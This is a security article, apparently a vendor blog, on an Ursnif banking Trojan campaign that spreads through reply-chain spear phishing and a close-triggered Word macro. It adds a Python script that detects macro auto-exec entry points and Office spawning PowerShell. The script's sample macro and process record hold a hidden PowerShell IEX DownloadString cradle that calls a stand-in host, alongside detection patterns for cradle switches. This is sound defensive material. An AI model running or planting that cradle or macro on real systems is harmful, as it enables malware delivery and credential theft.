A new strain of the Ursnif banking Trojan has been identified, and the actors behind the latest campaign have adopted a new tactic to spread the malware more quickly.
The Ursnif banking Trojan is one of the most commonly encountered banking Trojans. As with other banking Trojans, its purpose is to steal credentials such as logins for online banking websites, corporate bank details, and credit card numbers. The stolen credentials are then used to make fraudulent financial transactions. It is not unusual for accounts to be drained before the transactions are noticed, by which time the funds have cleared, have been withdrawn, and the criminal's receiving account has been closed. Recovering the stolen funds may well be impossible.
Once installed, the malware steals a wide range of sensitive data, capturing credentials as they are typed into the browser. The Ursnif banking Trojan also takes screenshots of the infected device and logs keystrokes. All of that information is silently exfiltrated to the attacker's command-and-control (C2) server.
Banking Trojans are distributed in a number of ways. They are often hosted on websites and downloaded in drive-by attacks, with traffic driven to the malicious websites by malvertising campaigns or spam emails containing hyperlinks. Legitimate websites are compromised using brute-force attacks, and exploit kits are installed on those sites to attack visitors who have failed to keep their software up to date. In many cases, the malware is delivered by spam email, hidden in attachments.
Spam email has previously been used to distribute the Ursnif banking Trojan, and the most recent campaign is no different in that regard. However, the latest campaign uses a new tactic to increase the chance of infection and to spread infections more quickly and widely. Financial institutions have been the main target of this banking Trojan, but with this most recent attack method infections are far more widespread.
Infection results in the user's contact list being harvested and spear phishing emails being sent to each of the user's contacts. Since the spear phishing emails come from a trusted email account, the chances of them being opened are significantly higher. Simply opening the email will not lead to infection; for that to take place, the recipient must click on the email attachment. Again, since it has come from a trusted person, that is more probable.
The actors behind this latest Ursnif banking Trojan campaign have another trick to increase trust and ensure their payload is delivered. The spear phishing emails contain message threads from past communications. The email appears to be a reply to a previous email and includes details of past correspondence.
A short line of text is included in an attempt to get the recipient to open the email attachment: a Word document containing a malicious macro. The macro must be enabled by the recipient unless macros have already been set to run automatically, and even once enabled it does not execute until the Word document is closed. When the macro runs, it launches PowerShell commands that download the Ursnif Trojan, which then starts logging activity on the infected device and sends further spear phishing emails to the new victim's contacts.
This is not an original tactic, but it is new to Ursnif, and it is likely to see infections spread much more swiftly. Additionally, the malware incorporates a number of further techniques to hamper detection, allowing information to be stolen and bank accounts emptied before the infection is discovered; the Trojan even erases itself once it has run.
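The delivery chain described above gives defenders two places to look: the macro itself (an entry point that fires when the document is closed, combined with a call that starts another process) and the process telemetry on the endpoint (Word spawning PowerShell with download-cradle switches). The following is an added example, not code from the original article or from any vendor product. The macro source, the process-creation records, the process names and the URL are all constructed for illustration and are not real Ursnif indicators; the regular expressions are generic heuristics, not signatures for this campaign.

```python
"""Two lightweight checks for a macro-to-PowerShell delivery chain.

Check 1 inspects extracted VBA source (for example the text olevba prints).
Check 2 inspects process-creation records in Sysmon Event ID 1 style.
All sample data is constructed and carries no real malware indicators.
"""
import re
from typing import Dict, Iterable, List, Tuple

# --- Check 1: static look at macro source --------------------------------

# Entry points that run without a click once macros are enabled.
# Document_Close / AutoClose fire when the document is closed (the trigger
# described above); the Open variants are included so the check does not
# miss the more common choice.
AUTO_EXEC_PROCS = re.compile(
    r"\b(Document_Close|AutoClose|Document_Open|AutoOpen|Workbook_Open)\b", re.I
)
# Ways VBA reaches out to start another process.
SHELL_CALLS = re.compile(
    r"\b(Shell|WScript\.Shell|CreateObject|ShellExecute|powershell)\b", re.I
)


def flag_macro_source(vba: str) -> Dict[str, object]:
    """Report auto-exec entry points and process-spawning calls in macro source."""
    auto = {m.lower() for m in AUTO_EXEC_PROCS.findall(vba)}
    shell = {m.lower() for m in SHELL_CALLS.findall(vba)}
    return {
        "auto_exec": sorted(auto),
        "shell_calls": sorted(shell),
        # Both together: "runs by itself and launches something".
        "suspicious": bool(auto) and bool(shell),
    }


# --- Check 2: process-creation telemetry ---------------------------------

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Generic download-cradle and hiding switches used in PowerShell one-liners.
CRADLE_MARKERS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|-nop\b"
    r"|-e(?:xecutionpolicy|p)\s+bypass)",
    re.I,
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_process_event(event: dict) -> List[str]:
    """Return the reasons one record is suspicious (empty list means benign)."""
    reasons: List[str] = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office_spawns_" + image.split(".")[0])
    if image == "powershell.exe":
        hits = sorted({m.group(0).lower() for m in CRADLE_MARKERS.finditer(cmd)})
        if hits:
            reasons.append("download_cradle:" + ",".join(hits))
    return reasons


def scan_events(events: Iterable[dict]) -> List[Tuple[object, List[str]]]:
    """Return (ProcessId, reasons) for every record that trips at least one check."""
    flagged = []
    for ev in events:
        reasons = flag_process_event(ev)
        if reasons:
            flagged.append((ev.get("ProcessId"), reasons))
    return flagged


# Constructed sample macro (not real Ursnif code): fires on close, runs a cradle.
SAMPLE_VBA = '''
Private Sub Document_Close()
    Dim o As Object
    Set o = CreateObject("WScript.Shell")
    o.Run "powershell -w hidden -nop -ep bypass -c ""IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')""", 0
End Sub
'''

# Constructed process-creation records in Sysmon Event ID 1 style.
SAMPLE_EVENTS = [
    {   # Word launching a hidden PowerShell download cradle: should be flagged.
        "ProcessId": 4212,
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -nop -ep bypass -c \"IEX (New-Object "
                       "Net.WebClient).DownloadString('http://example.invalid/x')\"",
    },
    {   # An administrator's script: PowerShell, but benign parent and arguments.
        "ProcessId": 4300,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\backup.ps1",
    },
    {   # Word spawning its print helper: Office parent, but not a script host.
        "ProcessId": 4410,
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": "splwow64.exe 12288",
    },
]

if __name__ == "__main__":
    print("macro:", flag_macro_source(SAMPLE_VBA))
    for pid, reasons in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(reasons)}")
```

Only the first record is reported: the second is PowerShell with an ordinary parent and no cradle switches, and the third shows that an Office parent alone is not enough, since Word legitimately spawns helpers such as its print process. In production the same parent/child and command-line logic belongs in the EDR or SIEM rule set rather than a script, and the marker lists need tuning against the environment's own PowerShell usage.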
Malware is always changing, and new tactics are constantly created to increase the likelihood of infection. The most recent campaign shows just how important it is to block email threats before they reach end users’ inboxes.
If you use an advanced spam filter like SpamTitan, malicious emails can be blocked before they reach end users' inboxes, greatly reducing the danger posed by malware infections.